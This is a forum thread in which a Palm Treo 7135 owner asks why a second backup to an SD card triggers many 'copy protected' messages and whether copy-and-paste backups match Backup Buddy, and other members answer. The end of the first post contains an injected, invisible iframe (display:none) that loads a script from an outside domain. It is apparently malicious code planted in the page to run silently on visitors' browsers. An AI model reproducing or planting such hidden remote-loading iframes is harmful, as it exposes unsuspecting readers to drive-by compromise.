+ Reply to Thread

2nd backup to card ?

Why is it now that I'm backing up a second time to my 256 Lexar card I have to continually keep clicking ok when a message comes up saying "certain files are copy protected"
    I had to hit ok at least 40 times. I didn't have to do that more than a few times the first time I backed up last week.
    So am I really doing any good if so many files are not being backed up. I know I could recover the copy protected files if I had a fatel rest from the CD but not if I'm on the road.

On another note the SD card is a true blessing. I was going to wait another couple of weeks before I beamed over a bunch of games from my old palm V. I wanted to make sure the phone was stable first, because once I started loading programs I couldn't isolate soft resets if they started. Well, I was chomping at the bit and couldn't wait (I need these games while in office meetings) so I beamed over a dozen or so and walla . . fatal reset. I even ran through each as I loaded them on to make sure they would work with the 7135.
    Only Space invaders didn't work (caused soft reset) so I deleted it, but an hour later the phone went fatal. all records gone coming out of reset. I even did a soft reset not hard. At least I didn't get a chance to back up any unstable games, they are all gone now anyway . . Everything restored from the card (no games were on B/U card yet).
    Card is worth every dollar!

But . . . is my backup program to the card working correctly with all those copy protected messages coming up?
    Thx<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Check the copy protection switch on the card. Insertion and removal of the card can tend to cause the switch to slide into the "Lock" position.

Originally posted by HoTSynC
    Check the copy protection switch on the card. Insertion and removal of the card can tend to cause the switch to slide into the "Lock" position.
    Thx HoTSynC, I did that, it was not locked. I realized what I did different on this back up. . . The first time I B/U it was with backup buddy. The 2nd time I backed up I forgot I had back up buddy. I don't even know if BUB was still there in the Palm after the fatal reset.
    When I restored I only copied the SD files and pasted to the internal palm.
    I hotsynced this AM and BUB is back. I B/U again.
    Can someone without back up buddy get a safe backup by select all, copy and paste to card. And do the same to restore. Will this be as accurate as using BUB?
    Do you think I screwed up my hotsync with outlook because I did it by copy and paste all files. If so, I'll have my office computer overwrite my palm which the office is a good copy.

Originally posted by Expidia
    Thx HoTSynC, I did that, it was not locked. I realized what I did different on this back up. . . The first time I B/U it was with backup buddy. The 2nd time I backed up I forgot I had back up buddy. I don't even know if BUB was still there in the Palm after the fatal reset.
    When I restored I only copied the SD files and pasted to the internal palm.
    I hotsynced this AM and BUB is back. I B/U again.
    Can someone without back up buddy get a safe backup by select all, copy and paste to card. And do the same to restore. Will this be as accurate as using BUB?
    Do you think I screwed up my hotsync with outlook because I did it by copy and paste all files. If so, I'll have my office computer overwrite my palm which the office is a good copy.
    I don't see any problems w/ copy and paste using FileManager. But it's probably the reason you got the copy protect errors. BB supposedly bypasses the protection. Also copying from the card will not affect the hotsync, because hotsync looks at the modified time in the PDB or PRC file itself, since the Palm RAM doesn't keep that info.

Originally posted by KLiuLess
    I don't see any problems w/ copy and paste using FileManager. But it's probably the reason you got the copy protect errors. BB supposedly bypasses the protection. Also copying from the card will not affect the hotsync, because hotsync looks at the modified time in the PDB or PRC file itself, since the Palm RAM doesn't keep that info.
    Thx for the info KLiuLess.